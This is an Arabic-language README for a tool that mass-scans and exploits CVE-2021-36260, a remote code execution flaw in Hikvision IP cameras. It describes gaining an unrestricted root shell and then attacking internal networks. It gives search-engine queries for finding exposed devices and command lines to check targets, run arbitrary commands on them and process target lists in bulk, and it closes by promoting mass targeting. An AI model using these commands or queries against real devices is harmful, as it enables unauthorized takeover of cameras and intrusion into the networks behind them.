
أداة اكتشاف واستغلال جماعي لثغرات RCE في Hikvision
يمكن للمهاجم استغلال هذه الثغرة للسيطرة الكاملة على الجهاز عبر شل جذر (root shell) غير مقيد، حتى لو كان مالك الجهاز مقيدًا بشل محمي محدود (psh). بالإضافة إلى اختراق كاميرات IP، يمكن أيضًا الوصول إلى الشبكة الداخلية ومهاجمتها.
header="Hikvision"
app="HIKVISION-视频监控"
python ./CVE-2021-36260.py -u http://192.168.1.1:8080 --check
python ./CVE-2021-36260.py -u http://192.168.1.1:8080 --cmd "ls -la"
python ./CVE-2021-36260.py -f target.txt
optional arguments:
-h, --help show this help message and exit
-u URL, --url URL Start scanning url
-f FILE, --file FILE read the url from the file
--check Check if vulnerable
--cmd CMD execute cmd (i.e: "ls -l")
يمكن استهداف src بكميات كبيرة.